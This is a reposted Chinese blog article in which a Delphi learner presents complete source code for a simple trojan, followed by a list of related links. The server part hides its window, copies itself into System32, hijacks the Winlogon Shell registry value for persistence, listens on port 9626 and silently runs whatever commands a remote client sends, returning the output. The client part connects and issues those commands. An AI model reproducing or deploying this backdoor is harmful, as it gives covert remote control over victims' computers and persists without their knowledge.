Delphi下“培养”自己的简单木马

最新推荐文章于 2025-08-11 16:30:34 发布
最新推荐文章于 2025-08-11 16:30:34 发布
阅读量77 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 网络
原文链接:http://www.cnblogs.com/wenwencao/archive/2010/05/18/1738298.html
本文介绍了一位Delphi学习者如何从零开始编写一个简单的木马程序。该木马包含服务端和客户端两部分,服务端会在目标计算机上自启动并监听9626端口,接收来自客户端的命令并在本地执行,最终将执行结果返回给客户端。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Delphi下“培养”自己的简单木马


 

  刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!



  程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一自动行启动项,打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行,最后把回显传送回客户端。客户端很简单,跟服务端连接成功后,输入命令点执行,正常的话可以收到服务端的执行结果了。


  源码如下:

////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:greathjw@163.com////
////////QQ:231221////////////////
///部分代码从网上收集///////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;

type
TFmMain = class(TForm)
SS: TServerSocket;
Memo1: TMemo;
procedure FormCreate(Sender: TObject);
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;
reg:TRegistry;

implementation

{$R *.dfm}

procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
  Application.ShowMainForm:=False;
  FmMain.Left:=-200; //运行不显示窗口
reg:=TRegistry.Create;
  reg.RootKey:=HKEY_LOCAL_MACHINE;
  reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
  if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
  reg.WriteString('Shell','Explorer.exe Lysvr.exe'); //建立开机启动项
reg.Free;
  GetSystemDirectory(sysdir,50);
  if not FileExists(sysdir+'\Lysvr.exe') then
  copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);
  
  SS.Port:=9626;
  try
    SS.Active:=True;
    except
    end;
  end;
  
  procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
  begin
    Socket.SendText('连接成功'); //发现有连接时回传‘连接成功 ’
end;
  
  procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
  var
  RemoteCmd:string;
  hReadPipe,hWritePipe:THandle;
  si:STARTUPINFO;
  lsa:SECURITY_ATTRIBUTES;
  pi:PROCESS_INFORMATION;
  cchReadBuffer:DWORD;
  ph:PChar;
  fname:PChar;
  res:string;
  begin
    Memo1.Clear;
    remotecmd:=Socket.ReceiveText;
    fname:=allocmem(255);
    ph:=AllocMem(5000);
    lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
    lsa.lpSecurityDescriptor :=nil;
    lsa.bInheritHandle :=True;
    if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
    begin
      socket.SendText('不能创建管道');
      exit;
    end;
    fillchar(si,sizeof(STARTUPINFO),0);
    si.cb:=sizeof(STARTUPINFO);
    si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
    si.wShowWindow:=SW_HIDE;
    si.hStdOutput:=hWritePipe;
    StrPCopy(fname,remotecmd);
    /////执行CMD命令////
if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
    begin
      socket.SendText('不能创建进程');
      FreeMem(ph);
      FreeMem(fname);
      Exit;
    end;
    while(true) do
    begin
      if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;
      if cchReadBuffer<>0 then
      begin
        if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
        ph[cchReadbuffer]:=chr(0);
        Memo1.Lines.Add(ph);
      end
      else
      if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;
      Sleep(100);
    end;
    ph[cchReadBuffer]:=chr(0);
    Memo1.Lines.Add(ph); //memo接收回显
CloseHandle(hReadPipe);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    CloseHandle(hWritePipe);
    FreeMem(ph);
    FreeMem(fname);
    socket.SendText(Memo1.Text); ///将回显发送回客户端
end;
  
end.

///////////////////////////////////////////////////////////////////////////////////////////

//////客户端/////////////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:greathjw@163.com////
////////QQ:231221////////////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type
TFmMain = class(TForm)
WebBrowser1: TWebBrowser;
Label3: TLabel;
Edit2: TEdit;
Label4: TLabel;
Edit3: TEdit;
Button2: TButton;
CS: TClientSocket;
Edit4: TEdit;
Label5: TLabel;
Memo1: TMemo;
BitBtn2: TBitBtn;
procedure Button2Click(Sender: TObject);
procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
procedure BitBtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;

implementation

{$R *.dfm}

procedure TFmMain.Button2Click(Sender: TObject);
begin
  CS.Host:=Edit2.Text;
  CS.Port:=StrToInt(Edit3.Text);
  CS.Open;
end;

procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
begin
  Memo1.Clear;
  Memo1.Lines.Add(Socket.ReceiveText);
  Memo1.Lines.Add('');
end;

procedure TFmMain.BitBtn2Click(Sender: TObject);
begin
  CS.Socket.SendText(edit4.Text);
end;

end.

转载于:https://www.cnblogs.com/wenwencao/archive/2010/05/18/1738298.html

教程-“培养”自己的简单木马
weixin_34417814的博客
07-28 95
刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学Delphi快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!  程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一自动行启动项,打开本机9626端口开始等待接收客户端的数据。...
分享一些自己的学习方法
嘻哈包袱铺 专栏
09-13 1508
转载自:https://paper.dropbox.com/doc/ViVmfES5n0eGv5DhvzJHH?t=277428713177851 每天,都会有人在微博上私信我,问我关于学习和成长的问题。这种问题我一般都不会回复某个人,毕竟每个人的情况不一样,每个人对待事物的性格也不一样,我不能夸下海口的说,你看某本书几个月就能如何如何,我能做的多数时候只是鼓励鼓励,其次我也从不认为
分享一些自己的学习历程和学习方法
吧主
09-27 2079
每天,都会有人在微博上私信我,问我关于学习和成长的问题。这种问题我一般都不会回复某个j,毕竟每个人的情况不一样,每个人对待事物的性格也不一样,我不能夸下海口的说,你看某本书几个月就能如何如何,我能做的多数时候只是鼓励鼓励,其次我也从不认为我已经成长到一个多高的境界上,让我去给别人做指导,我还是当之有愧的。
分享一些自己的学习过程和学习方法(来自daimajia)
weixin_34037173的博客
09-30 186
每天,都会有人在微博上私信我,问我关于学习和成长的问题。这种问题我一般都不会回复某个j,毕竟每个人的情况不一样,每个人对待事物的性格也不一样,我不能夸下海口的说,你看某本书几个月就能如何如何,我能做的多数时候只是鼓励鼓励,其次我也从不认为我已经成长到一个多高的境界上,让我去给别人做指导,我还是当之有愧的。 但是,有时候看到大家私信我的时候,确实是处于一种很痛苦或是需要帮助的状态上。 最近晚上有空...
谈黑洞2001杀防火墙的实现与对策
爱.NET
05-29 139
谈黑洞2001杀防火墙的实现与对策 文章作者:陈经韬 黑洞2001是今年1月份推出的国产远程管理工具,相对其它远程管理工具,它添加了个很有吸引力的功能:进程管家.它有什么用呢?在这里引述一下吴建蓉的论述:"多进程监控功能是干什么用的呢?原来随着大家安全意识的不断提高,大多数人都安装了防火墙,木马们的生存空间越来越小,为生存计,木马开发者想出了一个办法,他让木马服务端定时刷新进程,如果发现其中的进...
23届计算机专业毕设Java选题参考
laoman456的博客
10-23 8215
60.基于J2EE的B2C电子商务系统开发(论文+系统+开题报告+文献综述+任务书+答辩PPT+中期报表+外文文献+说明书).rar。5.java+sql企业固定资产管理系统(论文+系统+开题报告+任务书+中期考核报告+任务书+评语表+答辩PPT).rar。101.ASP.NET+SQL房地产管理系统设计与实现(开题报告+源代码+论文+任务书+工作总结+答辩PPT).rar。10.ASP.NET+SQL房地产管理系统设计与实现(开题报告+源代码+论文+任务书+工作总结+答辩PPT).rar。
Qingdao Panda进阶之路
热门推荐
抛洒热血的李洛克i _博客管理
08-30 1万+
黑客的基本技能 1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必...
【雷军】给程序员的五点建议--如何成为编程高手并以此创业
runing
10-29 1354
除非特别注明,鸡啄米文章均为原创 转载请标明本文地址:http://www.jizhuomi.com/career/286.html 写在前面:此篇文章出自雷军之手,是他为软件开发2.0技术大会准备的演讲稿,但由于某些原因没有派上用场。这里跟大家分享下,对我们程序员来说还是大有裨益的。        每个IT企业,尤其是初创企业,非常苦恼:找不到好的程序员。现在大学、软件
黑客技术零基础入门怎么学(黑客初级入门)
chengxuyuanyy的博客
06-09 791
黑客技术零基础入门学习路径:首先需掌握Web前后端开发基础(HTML/CSS/JavaScript/PHP/SQL)和服务器通讯原理;接着学习主流漏洞原理(XSS、CSRF、SQL注入等),建议通过SRC平台进行合法实战;编程语言推荐从PHP快速入门,有精力可学习C语言打基础。自学需持续关注黑客杂志、论坛和最新动态,掌握汇编等底层语言,并坚持编写自己的工具。学习动机应纯粹,需具备毅力与耐心,技术方向可分为网络安全(Hacker)和逆向工程(Cracker)两大领域,分别需要深入理解TCP/IP协议和反汇编技
介绍下自己的Delphi学习环境.pdf
06-11
介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi学习环境.pdf介绍下自己的Delphi...
delphi木马编写
02-14
网络安全领域,Delphi由于其高效的代码生成和丰富的库支持,也被不法分子用于编写恶意软件,如木马。"龙天技术论坛"(LTHack.com)提及的是一个可能讨论此类话题的在线社区。 在"delphi木马编写"这个主题中,我们...
delphi 删除指定文件夹下所有文件.txt
08-11
delphi 删除指定文件夹下所有文件
Delphi 下 Intraweb 开发WEB程序应用实战(2.0).pdf
09-24
Delphi 下 Intraweb 开发WEB程序应用实战(2.0).pdf Delphi 下 Intraweb 开发WEB程序应用实战(2.0).pdf Delphi 下 Intraweb 开发WEB程序应用实战(2.0).pdf Delphi 下 Intraweb 开发WEB程序应用实战(2.0).pdf Delphi ...
Delphi下ClientDataSet使用例子
05-18
摘要:Delphi源码,控件组件,ClientDataSet Delphi环境下的ClientDataSet使用例子。ClientDataSet是Delphi三层开发常用控件。通过此例子帮助那些初学者学会ClientDataSet的使用,简单易懂。演示打开本地文件、保存到...
海康威视摄像头实时推流到阿里云公网服务器(Windows + FFmpeg + nginx-rtmp)
willem的博客
08-09 1410
摘要: 本文详细介绍将海康威视摄像头视频流通过Windows电脑推送到阿里云服务器的完整方案。步骤包括:1)在阿里云ECS部署nginx-rtmp服务并开放端口;2)Windows端安装FFmpeg,通过RTSP拉取摄像头流并转推RTMP协议;3)使用VLC或网页进行公网播放验证;4)通过nssm工具将推流程序注册为Windows服务实现长期运行。方案支持低延迟传输,提供常见问题排查方法和一键脚本,适用于7×24小时监控场景,最终实现公网多终端访问摄像头视频流。
如何安装 Git (windows/mac/linux)
最新发布
五岁小孩的博客
08-11 447
本文详细介绍了在Windows、Mac和Linux系统下安装Git版本控制系统的具体步骤。Windows和Mac用户需从官网下载对应版本安装包并完成安装,可通过右键菜单或命令git --version验证。Linux用户直接使用系统命令安装(如CentOS用yum install git)。文章还提供了可选的全局配置指南,包括用户名邮箱设置、免密码配置和大仓库克隆优化等。安装完成后即可开始使用Git进行代码管理。
RAGFlow系列(06):升级到0.20.0版本的详细操作步骤
持之以恒
08-07 436
RAGFlow升级到0.20.0版本的具体操作步骤
MySQL 极简安装挑战:跨平台高效部署指南
一名梦想用科技与数学改变人类的世界的人
08-07 1219
本文介绍了MySQL数据库的极简安装与部署方法,涵盖Linux、Windows和macOS三大平台。核心原则包括最小化安装必要组件、采用无交互命令行模式、实施安全基线配置。详细说明了各平台的具体安装步骤:Linux环境通过自动化脚本实现快速部署,Windows采用免安装ZIP包方式,macOS则使用Homebrew简化安装流程。文章还强调了安全加固措施,如强化密码策略、控制远程访问、开启日志审计等,并提供了性能测试和常见问题解决方法。整套方案旨在实现MySQL的高效、安全部署,适用于生产环境和开发测试场景。
linux centos安装python3.13
hzp666的博客
08-08 239
sudo make altinstall # 重要:使用 altinstall 避免覆盖系统Python。make -j $(nproc) # 使用所有CPU核心加速编译。# 3. 配置和编译(安装到 /usr/local)# 2. 下载 Python 3.13 源码。# 应显示:Python 3.13.0。# 1. 安装编译依赖。
Delphi7中Panel透明效果的简易实现方法
下面将详细介绍Delphi7环境下实现Panel透明化所需了解的知识点。 首先,Delphi7是Embarcadero公司发布的一款支持Windows操作系统的集成开发环境(IDE),主要用于使用Object Pascal语言开发应用程序。它集成了许多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值